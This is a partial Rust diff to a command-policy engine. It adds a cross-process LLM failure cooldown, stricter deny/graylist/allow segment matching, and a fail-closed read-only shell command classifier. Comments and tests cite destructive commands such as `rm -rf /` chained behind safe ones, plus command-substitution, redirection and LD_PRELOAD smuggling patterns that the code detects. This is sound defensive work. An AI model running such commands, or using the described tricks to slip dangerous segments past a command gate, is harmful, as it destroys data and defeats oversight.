         let primary_mock = MockServer::start().await;
@@ -205,14 +280,14 @@ mod tests {
             .mount(&fallback_mock)
             .await;
 
-        let fc = FallbackClient::new(azure(primary_mock.uri()), azure(fallback_mock.uri()), None);
+        let fc = fc_isolated(azure(primary_mock.uri()), azure(fallback_mock.uri()), None);
 
         let r = fc.generate("hi", Some("m")).await;
         assert!(matches!(r, Err(LlmError::Auth(_))));
     }
 
     #[tokio::test]
-    #[serial(env_azure_hosts_fallback)]
+    #[serial(env_azure_hosts)]
     async fn cooldown_skips_primary_after_failure() {
         allow_local();
         let primary_mock = MockServer::start().await;
@@ -232,7 +307,7 @@ mod tests {
             .mount(&fallback_mock)
             .await;
 
-        let fc = FallbackClient::new(azure(primary_mock.uri()), azure(fallback_mock.uri()), None);
+        let fc = fc_isolated(azure(primary_mock.uri()), azure(fallback_mock.uri()), None);
 
         let _ = fc.generate("hi", Some("m")).await.unwrap();
         assert!(fc.cooldown_active());
@@ -246,7 +321,7 @@ mod tests {
     // Kills a mutant that drops the embed fallback (would surface the 503)
     // or that forwards to the primary a second time.
     #[tokio::test]
-    #[serial(env_azure_hosts_fallback)]
+    #[serial(env_azure_hosts)]
     async fn embed_falls_back_on_primary_transient() {
         allow_local();
         let primary_mock = MockServer::start().await;
@@ -268,7 +343,7 @@ mod tests {
             .mount(&fallback_mock)
             .await;
 
-        let fc = FallbackClient::new(
+        let fc = fc_isolated(
             azure(primary_mock.uri()),
             azure(fallback_mock.uri()),
             Some("fb-embed-model".into()),
@@ -285,7 +360,7 @@ mod tests {
     // Branch: embed() primary terminal (401) error -> NO fallback, error surfaces.
     // Kills a mutant that treats every embed error as transient and falls back.
     #[tokio::test]
-    #[serial(env_azure_hosts_fallback)]
+    #[serial(env_azure_hosts)]
     async fn embed_terminal_error_does_not_fall_back() {
         allow_local();
         let primary_mock = MockServer::start().await;
@@ -305,7 +380,7 @@ mod tests {
             .mount(&fallback_mock)
             .await;
 
-        let fc = FallbackClient::new(azure(primary_mock.uri()), azure(fallback_mock.uri()), None);
+        let fc = fc_isolated(azure(primary_mock.uri()), azure(fallback_mock.uri()), None);
 
         let r = fc.embed("hi", Some("m")).await;
         assert!(matches!(r, Err(LlmError::Auth(_))));
@@ -320,7 +395,7 @@ mod tests {
     // model arg. Kills a mutant that hard-codes the fallback model to None or
     // drops the `.or(caller)` fallback in `fb_model`.
     #[tokio::test]
-    #[serial(env_azure_hosts_fallback)]
+    #[serial(env_azure_hosts)]
     async fn fallback_uses_caller_model_when_no_override() {
         allow_local();
         let primary_mock = MockServer::start().await;
@@ -347,17 +422,171 @@ mod tests {
             .await;
 
         // fallback_model = None -> fb_model must reuse the caller's model arg.
-        let fc = FallbackClient::new(azure(primary_mock.uri()), azure(fallback_mock.uri()), None);
+        let fc = fc_isolated(azure(primary_mock.uri()), azure(fallback_mock.uri()), None);
 
         let out = fc.generate("hi", Some("caller-model")).await.unwrap();
         assert_eq!(out, "via-caller-model");
     }
 
+    /// Unique temp base dir for the cross-process failure marker.
+    fn temp_health_base(tag: &str) -> std::path::PathBuf {
+        let dir = std::env::temp_dir().join(format!(
+            "clx-fallback-health-{tag}-{}-{:?}",
+            std::process::id(),
+            std::thread::current().id()
+        ));
+        let _ = std::fs::create_dir_all(&dir);
+        dir
+    }
+
+    // FIX-7: a primary failure recorded by a PRIOR process (file marker) must
+    // make a freshly-constructed FallbackClient (clean in-process state) skip
+    // the primary entirely. Before the fix the cooldown lived only in an
+    // in-process Mutex, so a new process always re-hit the dead primary.
+    #[tokio::test]
+    #[serial(env_azure_hosts)]
+    async fn cross_process_recorded_failure_skips_primary() {
+        allow_local();
+        let base = temp_health_base("recent");
+        // Simulate a prior process recording a recent primary failure.
+        crate::llm_health::record_primary_failure_in(&base);
+
+        let primary_mock = MockServer::start().await;
+        let fallback_mock = MockServer::start().await;
+
+        // Primary must NOT be contacted at all.
+        Mock::given(matchers::method("POST"))
+            .and(matchers::path("/openai/v1/chat/completions"))
+            .respond_with(ResponseTemplate::new(200).set_body_json(serde_json::json!({
+                "choices": [{ "message": { "content": "should-not-happen" } }]
+            })))
+            .expect(0)
+            .mount(&primary_mock)
+            .await;
+        Mock::given(matchers::method("POST"))
+            .and(matchers::path("/openai/v1/chat/completions"))
+            .respond_with(ResponseTemplate::new(200).set_body_json(serde_json::json!({
+                "choices": [{ "message": { "content": "from fallback" } }]
+            })))
+            .expect(1)
+            .mount(&fallback_mock)
+            .await;
+
+        // Fresh client: in-process cooldown is empty, only the file marker is set.
+        let fc = FallbackClient::new_with_health_base(
+            azure(primary_mock.uri()),
+            azure(fallback_mock.uri()),
+            None,
+            base.clone(),
+        );
+        assert!(
+            fc.cooldown_active(),
+            "recent cross-process failure must arm the cooldown"
+        );
+        let out = fc.generate("hi", Some("m")).await.unwrap();
+        assert_eq!(out, "from fallback");
+
+        let _ = std::fs::remove_dir_all(&base);
+    }
+
+    // FIX-7: an ABSENT cross-process marker must NOT short-circuit; the primary
+    // is contacted normally.
+    #[tokio::test]
+    #[serial(env_azure_hosts)]
+    async fn absent_cross_process_marker_uses_primary() {
+        allow_local();
+        let base = temp_health_base("absent");
+        let _ = std::fs::remove_dir_all(&base);
+        let _ = std::fs::create_dir_all(&base);
+
+        let primary_mock = MockServer::start().await;
+        let fallback_mock = MockServer::start().await;
+
+        Mock::given(matchers::method("POST"))
+            .and(matchers::path("/openai/v1/chat/completions"))
+            .respond_with(ResponseTemplate::new(200).set_body_json(serde_json::json!({
+                "choices": [{ "message": { "content": "from primary" } }]
+            })))
+            .expect(1)
+            .mount(&primary_mock)
+            .await;
+        Mock::given(matchers::method("POST"))
+            .and(matchers::path("/openai/v1/chat/completions"))
+            .respond_with(ResponseTemplate::new(200))
+            .expect(0)
+            .mount(&fallback_mock)
+            .await;
+
+        let fc = FallbackClient::new_with_health_base(
+            azure(primary_mock.uri()),
+            azure(fallback_mock.uri()),
+            None,
+            base.clone(),
+        );
+        assert!(
+            !fc.cooldown_active(),
+            "no recorded failure => cooldown inactive"
+        );
+        let out = fc.generate("hi", Some("m")).await.unwrap();
+        assert_eq!(out, "from primary");
+
+        let _ = std::fs::remove_dir_all(&base);
+    }
+
+    // FIX-7: an EXPIRED marker (older than COOLDOWN) must NOT short-circuit.
+    #[tokio::test]
+    #[serial(env_azure_hosts)]
+    async fn expired_cross_process_marker_uses_primary() {
+        allow_local();
+        let base = temp_health_base("expired");
+        crate::llm_health::record_primary_failure_in(&base);
+
+        // Backdate the marker well beyond COOLDOWN (30s).
+        let marker = base.join("primary_llm_failure");
+        let past = std::time::SystemTime::now() - Duration::from_mins(2);
+        let times = std::fs::FileTimes::new().set_modified(past);
+        let f = std::fs::File::options().write(true).open(&marker).unwrap();
+        f.set_times(times).unwrap();
+        drop(f);
+
+        let primary_mock = MockServer::start().await;
+        let fallback_mock = MockServer::start().await;
+        Mock::given(matchers::method("POST"))
+            .and(matchers::path("/openai/v1/chat/completions"))
+            .respond_with(ResponseTemplate::new(200).set_body_json(serde_json::json!({
+                "choices": [{ "message": { "content": "from primary" } }]
+            })))
+            .expect(1)
+            .mount(&primary_mock)
+            .await;
+        Mock::given(matchers::method("POST"))
+            .and(matchers::path("/openai/v1/chat/completions"))
+            .respond_with(ResponseTemplate::new(200))
+            .expect(0)
+            .mount(&fallback_mock)
+            .await;
+
+        let fc = FallbackClient::new_with_health_base(
+            azure(primary_mock.uri()),
+            azure(fallback_mock.uri()),
+            None,
+            base.clone(),
+        );
+        assert!(
+            !fc.cooldown_active(),
+            "expired marker must NOT arm the cooldown"
+        );
+        let out = fc.generate("hi", Some("m")).await.unwrap();
+        assert_eq!(out, "from primary");
+
+        let _ = std::fs::remove_dir_all(&base);
+    }
+
     // Branch: is_available() short-circuits true when the PRIMARY is healthy.
     // Kills a mutant that flips the `||` to `&&` (would require both up) or one
     // that always returns false.
     #[tokio::test]
-    #[serial(env_azure_hosts_fallback)]
+    #[serial(env_azure_hosts)]
     async fn is_available_true_when_primary_healthy() {
         allow_local();
         let primary_mock = MockServer::start().await;
@@ -377,14 +606,14 @@ mod tests {
             .mount(&fallback_mock)
             .await;
 
-        let fc = FallbackClient::new(azure(primary_mock.uri()), azure(fallback_mock.uri()), None);
+        let fc = fc_isolated(azure(primary_mock.uri()), azure(fallback_mock.uri()), None);
         assert!(fc.is_available().await, "primary healthy => available");
     }
 
     // Branch: is_available() falls through to the FALLBACK when primary is down.
     // Kills a mutant that only checks the primary (would return false here).
     #[tokio::test]
-    #[serial(env_azure_hosts_fallback)]
+    #[serial(env_azure_hosts)]
     async fn is_available_true_when_only_fallback_healthy() {
         allow_local();
         let primary_mock = MockServer::start().await;
@@ -403,7 +632,7 @@ mod tests {
             .mount(&fallback_mock)
             .await;
 
-        let fc = FallbackClient::new(azure(primary_mock.uri()), azure(fallback_mock.uri()), None);
+        let fc = fc_isolated(azure(primary_mock.uri()), azure(fallback_mock.uri()), None);
         assert!(
             fc.is_available().await,
             "primary down but fallback healthy => still available"
@@ -413,7 +642,7 @@ mod tests {
     // Branch: is_available() returns false only when BOTH backends are down.
     // Kills a mutant that returns true unconditionally.
     #[tokio::test]
-    #[serial(env_azure_hosts_fallback)]
+    #[serial(env_azure_hosts)]
     async fn is_available_false_when_both_down() {
         allow_local();
         let primary_mock = MockServer::start().await;
@@ -430,7 +659,7 @@ mod tests {
             .mount(&fallback_mock)
             .await;
 
-        let fc = FallbackClient::new(azure(primary_mock.uri()), azure(fallback_mock.uri()), None);
+        let fc = fc_isolated(azure(primary_mock.uri()), azure(fallback_mock.uri()), None);
         assert!(
             !fc.is_available().await,
             "both backends down => not available"
diff --git a/crates/clx-core/src/llm_health.rs b/crates/clx-core/src/llm_health.rs
index d484fa4..636333b 100644
--- a/crates/clx-core/src/llm_health.rs
+++ b/crates/clx-core/src/llm_health.rs
@@ -61,6 +61,73 @@ fn write_health_to(path: &Path, available: bool) {
     let _ = fs::write(path, if available { "ok" } else { "down" });
 }
 
+// --- Cross-process primary-LLM failure cooldown (FIX-7) -----------------
+//
+// The `FallbackClient` cooldown was previously an in-process `Mutex` only.
+// CLX hooks run one-process-per-event, so the in-process state resets every
+// invocation and a sustained primary outage repeatedly pays the dead-primary
+// latency. These helpers persist the last primary-failure instant to a small
+// file so a recent failure recorded by a prior process can short-circuit to
+// the fallback. Read/write are best-effort, non-blocking, and bounded (a
+// single small file op).
+
+/// Name of the cross-process primary-LLM failure marker file.
+const PRIMARY_FAILURE_FILE: &str = "primary_llm_failure";
+
+/// Resolve the primary-failure marker path under the given data dir.
+fn primary_failure_path_in(base: &Path) -> PathBuf {
+    base.join(PRIMARY_FAILURE_FILE)
+}
+
+/// Returns `true` if the marker at `path` records a failure newer than
+/// `cooldown`. A missing/unreadable/expired marker returns `false`.
+fn primary_failure_active_at(path: &Path, cooldown: Duration) -> bool {
+    let Ok(metadata) = fs::metadata(path) else {
+        return false;
+    };
+    let age = SystemTime::now()
+        .duration_since(metadata.modified().unwrap_or(SystemTime::UNIX_EPOCH))
+        .unwrap_or(Duration::from_secs(u64::MAX));
+    age < cooldown
+}
+
+/// Record a primary-LLM failure at `path` (best-effort; touch the file so its
+/// mtime marks "now").
+fn record_primary_failure_at(path: &Path) {
+    if let Some(parent) = path.parent() {
+        let _ = fs::create_dir_all(parent);
+    }
+    let _ = fs::write(path, b"down");
+}
+
+/// Returns `true` if a primary-LLM failure was recorded (by this or any prior
+/// process) within `cooldown`, using the default CLX data dir.
+///
+/// Best-effort and non-blocking: any IO error reads as "no recent failure".
+#[must_use]
+pub fn primary_failure_active(cooldown: Duration) -> bool {
+    primary_failure_active_at(&primary_failure_path_in(&data_dir()), cooldown)
+}
+
+/// Like [`primary_failure_active`] but against a caller-supplied base dir
+/// (used by tests to isolate the marker from the real data dir).
+#[must_use]
+pub(crate) fn primary_failure_active_in(base: &Path, cooldown: Duration) -> bool {
+    primary_failure_active_at(&primary_failure_path_in(base), cooldown)
+}
+
+/// Record a primary-LLM failure (cross-process) at the default CLX data dir.
+///
+/// Best-effort: silently ignores write failures.
+pub fn record_primary_failure() {
+    record_primary_failure_at(&primary_failure_path_in(&data_dir()));
+}
+
+/// Like [`record_primary_failure`] but against a caller-supplied base dir.
+pub(crate) fn record_primary_failure_in(base: &Path) {
+    record_primary_failure_at(&primary_failure_path_in(base));
+}
+
 /// Read the cached Ollama health status from disk.
 ///
 /// Returns [`HealthStatus::Unknown`] if the file is missing, stale (older
diff --git a/crates/clx-core/src/policy/cache.rs b/crates/clx-core/src/policy/cache.rs
index e6cfc7f..e7a57fa 100644
--- a/crates/clx-core/src/policy/cache.rs
+++ b/crates/clx-core/src/policy/cache.rs
@@ -150,9 +150,26 @@ impl ValidationCache {
 
 /// Compute a cache key from command and working directory.
 ///
-/// Uses full string concatenation instead of hashing to eliminate
-/// collision risk from non-cryptographic hash functions.
+/// Uses a NUL (`\0`) separator rather than a printable delimiter so the
+/// `(working_dir, command)` pair maps injectively to a key. NUL is illegal in
+/// both filesystem paths and shell command strings, so it cannot appear in
+/// either field; the encoding therefore has no collisions (unlike a `:`
+/// separator, where `("/a", "b:c")` and `("/a:b", "c")` collide).
 #[must_use]
 pub fn compute_cache_key(command: &str, working_dir: &str) -> String {
-    format!("{working_dir}:{command}")
+    format!("{working_dir}\0{command}")
+}
+
+#[cfg(test)]
+mod tests {
+    use super::compute_cache_key;
+
+    #[test]
+    fn cache_key_is_injective_for_colon_bearing_pairs() {
+        // These two distinct (cwd, cmd) pairs collided under a `:` separator
+        // (both produced "/a:b:c"); the NUL separator keeps them distinct.
+        let a = compute_cache_key("b:c", "/a");
+        let b = compute_cache_key("c", "/a:b");
+        assert_ne!(a, b, "distinct (cwd,cmd) pairs must yield distinct keys");
+    }
 }
diff --git a/crates/clx-core/src/policy/matching.rs b/crates/clx-core/src/policy/matching.rs
index 8e5a69e..14ab465 100644
--- a/crates/clx-core/src/policy/matching.rs
+++ b/crates/clx-core/src/policy/matching.rs
@@ -92,6 +92,16 @@ pub fn is_overbroad_allow_pattern(raw: &str) -> bool {
 /// - `*` matches any sequence of characters
 /// - Literal character matching
 /// - Pattern in format `command:args` where `:` separates command from args
+///
+/// # Invariant: `:` normalization is symmetric
+///
+/// `:` is normalized to a space in BOTH the pattern and the text. This keeps
+/// matching symmetric so a literal-colon pattern matches a literal-colon
+/// command (e.g. `npm run build:prod` matches `npm run build:prod`).
+/// Normalizing only one side would make `:`-bearing deny rules silently fail
+/// to match `:`-bearing commands. This function backs BOTH deny and
+/// allow/whitelist matching (see `policy/mod.rs`), so the symmetry must hold
+/// for both directions.
 #[must_use]
 pub fn glob_match(pattern: &str, text: &str) -> bool {
     // Handle the special command:args format
@@ -99,7 +109,10 @@ pub fn glob_match(pattern: &str, text: &str) -> bool {
     let normalized_pattern = pattern.replace(':', " ");
     let normalized_pattern = normalized_pattern.trim();
 
-    glob_match_impl(normalized_pattern, text.trim())
+    let normalized_text = text.replace(':', " ");
+    let normalized_text = normalized_text.trim();
+
+    glob_match_impl(normalized_pattern, normalized_text)
 }
 
 /// Internal glob matching implementation
diff --git a/crates/clx-core/src/policy/mod.rs b/crates/clx-core/src/policy/mod.rs
index db3996d..3b66f9f 100644
--- a/crates/clx-core/src/policy/mod.rs
+++ b/crates/clx-core/src/policy/mod.rs
@@ -42,6 +42,7 @@ pub use types::*;
 
 use matching::parse_pattern;
 use rate_limiter::RateLimiter;
+use read_only::split_segments_quote_aware;
 
 use tracing::debug;
 
@@ -56,6 +57,14 @@ pub struct PolicyEngine {
     /// Blacklist rules (checked first)
     blacklist: Vec<PolicyRule>,
 
+    /// Graylist rules (hidden/internal builtin-only `Ask` tier, Issue 3).
+    ///
+    /// Checked after the blacklist and before the whitelist. These rules are
+    /// NEVER loaded from or written to the learned-rules DB — they are populated
+    /// only by `load_builtin_rules`, so a graylist verdict can never be learned
+    /// or persisted.
+    graylist: Vec<PolicyRule>,
+
     /// Current project path (for filtering project-specific rules)
     project_path: Option<String>,
 
@@ -76,6 +85,7 @@ impl PolicyEngine {
         let mut engine = Self {
             whitelist: Vec::new(),
             blacklist: Vec::new(),
+            graylist: Vec::new(),
             project_path: None,
             rate_limiter: RateLimiter::new(30),
         };
@@ -89,6 +99,7 @@ impl PolicyEngine {
         Self {
             whitelist: Vec::new(),
             blacklist: Vec::new(),
+            graylist: Vec::new(),
             project_path: None,
             rate_limiter: RateLimiter::new(30),
         }
@@ -121,18 +132,44 @@ impl PolicyEngine {
         &self.blacklist
     }
 
-    /// Evaluate a command against policies
+    /// Get all graylist rules (hidden/internal builtin-only `Ask` tier).
+    pub fn graylist_rules(&self) -> &[PolicyRule] {
+        &self.graylist
+    }
+
+    /// Evaluate a command against policies (Issue 3 — ASYMMETRIC compound
+    /// matching).
     ///
-    /// Evaluation order:
-    /// 1. Check blacklist rules (deny if matched)
-    /// 2. Check whitelist rules (allow if matched)
-    /// 3. Return Ask (unknown command, needs L1 evaluation)
+    /// Evaluation order is blacklist → graylist → whitelist → fallthrough Ask,
+    /// but compound (multi-segment) handling is deliberately asymmetric so that
+    /// a single dangerous segment can never be "hidden" behind a safe one:
     ///
-    /// Returns the decision and optionally the matching rule.
+    /// 1. **Deny (blacklist):** deny if the WHOLE command matches a blacklist
+    ///    rule OR if ANY individual segment matches a blacklist rule. So
+    ///    `ls && rm -rf /` denies on the `rm -rf /` segment, and
+    ///    `git diff && rm -rf /` denies on segment 2 (it is NOT allowed just
+    ///    because `git diff` is whitelisted).
+    /// 2. **Ask (graylist):** after the deny check, return Ask if — splitting
+    ///    into segments and stripping a single leading literal `cd <one-token>`
+    ///    segment — ANY remaining segment matches a graylist rule.
+    /// 3. **Allow (whitelist):** allow ONLY if, after the same split + cd-strip,
+    ///    EVERY remaining segment individually matches a whitelist rule. Never
+    ///    "allow if any segment".
+    /// 4. **Fallthrough:** Ask (unknown command, needs Layer 1).
     pub fn evaluate(&self, tool_name: &str, command: &str) -> PolicyDecision {
-        // Check blacklist first (deny takes priority)
+        // Split into segments once (quote-aware). On unbalanced quotes the
+        // splitter returns None; we then fall back to treating the whole
+        // command as a single segment (the whole-command checks below still
+        // apply, and an unparseable command fails through to Ask).
+        let segments = split_segments_quote_aware(command).unwrap_or_default();
+
+        // 1. DENY — whole command OR any segment matches a blacklist rule.
         for rule in &self.blacklist {
-            if self.matches_rule(tool_name, command, rule) {
+            let matched_whole = self.matches_rule(tool_name, command, rule);
+            let matched_segment = segments
+                .iter()
+                .any(|seg| self.matches_rule(tool_name, seg, rule));
+            if matched_whole || matched_segment {
                 let reason = rule
                     .description
                     .clone()
@@ -145,23 +182,55 @@ impl PolicyEngine {
             }
         }
 
-        // Check whitelist (allow if matched)
-        for rule in &self.whitelist {
-            if self.matches_rule(tool_name, command, rule) {
+        // Segments to consider for graylist/whitelist matching: drop a single
+        // leading literal `cd <one-token>` segment so that `cd /repo && git diff`
+        // is judged on `git diff` alone.
+        let effective: Vec<&str> = strip_leading_cd(&segments);
+
+        // 2. ASK — any effective segment matches a graylist rule (after the deny
+        //    check has already ruled out a blacklist hit).
+        for rule in &self.graylist {
+            let matched_whole = self.matches_rule(tool_name, command, rule);
+            let matched_segment = effective
+                .iter()
+                .any(|seg| self.matches_rule(tool_name, seg, rule));
+            if matched_whole || matched_segment {
+                let reason = rule
+                    .description
+                    .clone()
+                    .unwrap_or_else(|| format!("Matched graylist pattern: {}", rule.pattern));
                 debug!(
-                    "Whitelist match: command='{}' pattern='{}'",
+                    "Graylist match: command='{}' pattern='{}'",
                     command, rule.pattern
                 );
-                return PolicyDecision::Allow;
+                return PolicyDecision::Ask { reason };
             }
         }
 
-        // Unknown command - needs Layer 1 evaluation
+        // 3. ALLOW — every effective segment must individually match a whitelist
+        //    rule. A single non-whitelisted segment => not allowed.
+        if !effective.is_empty()
+            && effective
+                .iter()
+                .all(|seg| self.matches_any_whitelist(tool_name, seg))
+        {
+            debug!("Whitelist match (all segments): command='{}'", command);
+            return PolicyDecision::Allow;
+        }
+
+        // 4. Unknown command - needs Layer 1 evaluation.
         PolicyDecision::Ask {
             reason: "Unknown command, requires review".to_string(),
         }
     }
 
+    /// True if `segment` matches any whitelist rule for `tool_name`.
+    fn matches_any_whitelist(&self, tool_name: &str, segment: &str) -> bool {
+        self.whitelist
+            .iter()
+            .any(|rule| self.matches_rule(tool_name, segment, rule))
+    }
+
     /// Check if a command matches a rule pattern
     fn matches_rule(&self, tool_name: &str, command: &str, rule: &PolicyRule) -> bool {
         // Check project path filter
@@ -190,5 +259,45 @@ impl PolicyEngine {
     }
 }
 
+/// Strip a single leading literal `cd <one-token>` segment from `segments`,
+/// returning the remaining segments as string slices (Issue 3).
+///
+/// The strip applies ONLY when the first segment is exactly `cd` followed by
+/// exactly ONE token that contains no shell metacharacters. So `cd /repo` is
+/// stripped, but `cd $(evil)`, `cd a b` (two tokens), and a bare `cd` are NOT
+/// stripped (they are kept so the dangerous/ambiguous form is still evaluated).
+fn strip_leading_cd(segments: &[String]) -> Vec<&str> {
+    if let Some((first, rest)) = segments.split_first()
+        && is_simple_cd_segment(first)
+        && !rest.is_empty()
+    {
+        return rest.iter().map(String::as_str).collect();
+    }
+    segments.iter().map(String::as_str).collect()
+}
+
+/// True if `segment` is a literal `cd` followed by exactly one metachar-free
+/// token (e.g. `cd /repo`, `cd src`). `cd`, `cd a b`, and `cd $(x)` are not.
+fn is_simple_cd_segment(segment: &str) -> bool {
+    let trimmed = segment.trim();
+    let Some(arg) = trimmed.strip_prefix("cd ") else {
+        return false;
+    };
+    let arg = arg.trim();
+    if arg.is_empty() {
+        return false;
+    }
+    // Exactly one token: no internal whitespace.
+    if arg.split_whitespace().count() != 1 {
+        return false;
+    }
+    // No shell metacharacters that could smuggle execution or expansion.
+    const METACHARS: &[char] = &[
+        '$', '`', '(', ')', '<', '>', '|', '&', ';', '*', '?', '{', '}', '[', ']', '~', '!', '\\',
+        '"', '\'',
+    ];
+    !arg.contains(METACHARS)
+}
+
 #[cfg(test)]
 mod tests;
diff --git a/crates/clx-core/src/policy/read_only.rs b/crates/clx-core/src/policy/read_only.rs
index cc6f60d..5eb774e 100644
--- a/crates/clx-core/src/policy/read_only.rs
+++ b/crates/clx-core/src/policy/read_only.rs
@@ -1,209 +1,641 @@
-//! Read-only command detection.
+//! Read-only command detection (token-first, fail-closed).
 //!
 //! Determines whether a shell command is read-only (does not modify files
 //! or system state). Read-only commands can be safely auto-allowed without
 //! showing a confirmation dialog.
+//!
+//! # Design: token-first, default-deny
+//!
+//! The classifier never matches raw substrings against the command. Instead
+//! it (1) screens the raw string for shell metacharacters that `shlex` cannot
+//! reason about, (2) tokenizes with `shlex::split`, (3) segments on shell
+//! control operators, and (4) requires EVERY segment to be *provably*
+//! side-effect-free via a curated allow-set plus per-tool token deny rules.
+//!
+//! Every uncertain path returns `false` (fail-closed): an unparseable command,
+//! an unknown program, or a recognized program used with an option we cannot
+//! prove safe all fall through to a confirmation prompt rather than being
+//! auto-allowed.
 
-/// Check if a command is read-only (doesn't modify files or system state)
+/// Check if a command is read-only (doesn't modify files or system state).
 ///
-/// Read-only commands are safe to auto-allow without showing confirmation dialog.
-/// This includes file viewing, searching, system info, and version checks.
-///
-/// For composite commands (pipes, &&, ||, ;), ALL parts must be read-only.
-/// Subshells (`$()`, backtick-substitution) are never considered read-only (potential injection).
+/// Read-only commands are safe to auto-allow without showing a confirmation
+/// dialog. For composite commands (pipes, `&&`, `||`, `;`, `&`), EVERY segment
+/// must be read-only. Command/process substitution, redirection, and embedded
+/// newlines make a command never read-only.
 #[must_use]
 pub fn is_read_only_command(command: &str) -> bool {
-    let trimmed = command.trim();
-
-    // Empty command is not read-only (could be anything)
-    if trimmed.is_empty() {
+    // 1. Raw-string metacharacter screen. `shlex` is not a shell parser; these
+    //    constructs can smuggle execution past token analysis, so any
+    //    occurrence is an immediate fail-closed reject.
+    if contains_dangerous_metachar(command) {
         return false;
     }
 
-    // Backtick command substitution is NEVER read-only
-    if trimmed.contains('`') {
+    // 2. Quote-aware split into segments on unquoted control operators
+    //    (`;`, `|`, `||`, `&`, `&&`). Shell operators do not require surrounding
+    //    whitespace and `shlex` does not model them, so we segment the raw string
+    //    ourselves, respecting quotes (so `grep 'a|b'` is not split). Unbalanced
+    //    quotes => None => fail-closed.
+    let Some(segments) = split_segments_quote_aware(command) else {
+        return false;
+    };
+    if segments.is_empty() {
         return false;
     }
 
-    // Command substitution $(cmd) is NEVER read-only
-    // But arithmetic expansion $((expr)) without command substitution is OK
-    // We need to check for $( that's not immediately followed by (
-    if let Some(pos) = trimmed.find("$(") {
-        // Check if it's actually $((
-        if pos + 2 < trimmed.len() {
-            let next_char = trimmed.as_bytes()[pos + 2];
-            // If the character after $( is not (, then it's command substitution
-            if next_char != b'(' {
-                return false;
-            }
-        } else {
-            // $( at end of string is command substitution
+    // 3-5. Every segment must tokenize and be provably read-only.
+    for seg in &segments {
+        let Some(tokens) = shlex::split(seg) else {
+            return false;
+        };
+        if tokens.is_empty() {
+            return false;
+        }
+        // A redirection operator anywhere => never read-only (write target).
+        if tokens.iter().any(|t| is_redirection_token(t)) {
+            return false;
+        }
+        if !segment_is_read_only(&tokens) {
             return false;
         }
     }
+    true
+}
 
-    // Process substitution is NEVER read-only
-    if trimmed.contains("<(") || trimmed.contains(">(") {
+/// Raw-string screen for shell metacharacters `shlex` cannot model.
+///
+/// Returns `true` (=> reject) for backticks, command substitution `$(` (ANY
+/// occurrence, including the arithmetic-nested `$(($(` form), process
+/// substitution `<(` / `>(`, and embedded newlines / carriage returns.
+fn contains_dangerous_metachar(command: &str) -> bool {
+    if command.contains('`')
+        || command.contains("<(")
+        || command.contains(">(")
+        || command.contains('\n')
+        || command.contains('\r')
+    {
+        return true;
+    }
+    // `$(` is command substitution and is rejected. Arithmetic expansion `$((`
+    // is allowed UNLESS it nests a command substitution. So reject any `$(`
+    // occurrence that is NOT immediately followed by another `(`. The nested
+    // `$(($(cmd)))` form is caught because its inner `$(` is followed by `c`.
+    let bytes = command.as_bytes();
+    let mut from = 0;
+    while let Some(rel) = command[from..].find("$(") {
+        let after = from + rel + 2;
+        if after >= bytes.len() || bytes[after] != b'(' {
+            return true;
+        }
+        from = after;
+    }
+    false
+}
+
+/// True if `token` is, starts with, or ends with a redirection operator —
+/// including arbitrary file descriptors (`3>`, `4>>`) and `&>`/`&>>`. Strips an
+/// optional leading fd number or `&` before checking for a leading `>`/`<`, so
+/// `3>/tmp/o` is caught as a write target (fail-closed).
+pub(crate) fn is_redirection_token(token: &str) -> bool {
+    let mut rest = token.trim_start_matches(|c: char| c.is_ascii_digit() || c == '&');
+    // Bash named file descriptor: `{varname}>file`.
+    if rest.starts_with('{')
+        && let Some(close) = rest.find('}')
+    {
+        rest = &rest[close + 1..];
+    }
+    rest.starts_with('>') || rest.starts_with('<') || token.ends_with('>') || token.ends_with('<')
+}
+
+/// Quote-aware split of a raw command into segments on unquoted control
+/// operators (`;`, `|`, `||`, `&`, `&&`). Operators inside single/double quotes
+/// (e.g. `grep 'a|b'`) or backslash-escaped are kept literally. Consecutive
+/// operators collapse and empty segments are dropped. Returns `None` on
+/// unbalanced quotes (fail-closed). Redirection (`>`/`<`) is NOT a separator —
+/// it stays in the segment and is rejected later by `is_redirection_token`.
+pub(crate) fn split_segments_quote_aware(command: &str) -> Option<Vec<String>> {
+    let mut segments = Vec::new();
+    let mut current = String::new();
+    let mut in_single = false;
+    let mut in_double = false;
+    let mut escaped = false;
+
+    for c in command.chars() {
+        if escaped {
+            current.push(c);
+            escaped = false;
+            continue;
+        }
+        match c {
+            '\\' if !in_single => {
+                current.push(c);
+                escaped = true;
+            }
+            '\'' if !in_double => {
+                in_single = !in_single;
+                current.push(c);
+            }
+            '"' if !in_single => {
+                in_double = !in_double;
+                current.push(c);
+            }
+            ';' | '|' | '&' if !in_single && !in_double => {
+                let trimmed = current.trim();
+                if !trimmed.is_empty() {
+                    segments.push(trimmed.to_string());
+                }
+                current.clear();
+            }
+            _ => current.push(c),
+        }
+    }
+
+    if in_single || in_double {
+        return None; // unbalanced quotes => fail-closed
+    }
+    let trimmed = current.trim();
+    if !trimmed.is_empty() {
+        segments.push(trimmed.to_string());
+    }
+    Some(segments)
+}
+
+/// True if `token` looks like a leading `NAME=VALUE` environment assignment.
+///
+/// Shell assignment names are `[A-Za-z_][A-Za-z0-9_]*`. The `=` must be present
+/// and the name non-empty and valid; otherwise it is a normal argument.
+fn is_env_assignment(token: &str) -> bool {
+    let Some(eq) = token.find('=') else {
+        return false;
+    };
+    let name = &token[..eq];
+    if name.is_empty() {
         return false;
     }
+    let mut chars = name.chars();
+    let first = chars.next().unwrap_or(' ');
+    if !(first.is_ascii_alphabetic() || first == '_') {
+        return false;
+    }
+    chars.all(|c| c.is_ascii_alphanumeric() || c == '_')
+}
 
-    // Arithmetic expansion with command substitution is NEVER read-only
-    // We need to detect $(($(cmd))) pattern specifically
-    if trimmed.contains("$(($(") {
+/// Decide whether a single segment (one simple command) is read-only.
+fn segment_is_read_only(tokens: &[String]) -> bool {
+    if tokens.is_empty() {
         return false;
     }
 
-    // For composite commands, check if ALL parts are read-only
-    if trimmed.contains('|')
-        || trimmed.contains("&&")
-        || trimmed.contains("||")
-        || trimmed.contains(';')
-    {
-        return is_composite_read_only(trimmed);
+    // a. Leading NAME=VALUE assignments. If any assignment is followed by a
+    //    program token, the program runs in a tampered environment
+    //    (LD_PRELOAD, NODE_OPTIONS, RUBYOPT, ...) => never read-only. Bare
+    //    `env`/`set` with ONLY assignments and no program is read-only.
+    let mut idx = 0;
+    while idx < tokens.len() && is_env_assignment(&tokens[idx]) {
+        idx += 1;
+    }
+    if idx > 0 {
+        // There was at least one leading assignment. A trailing program after
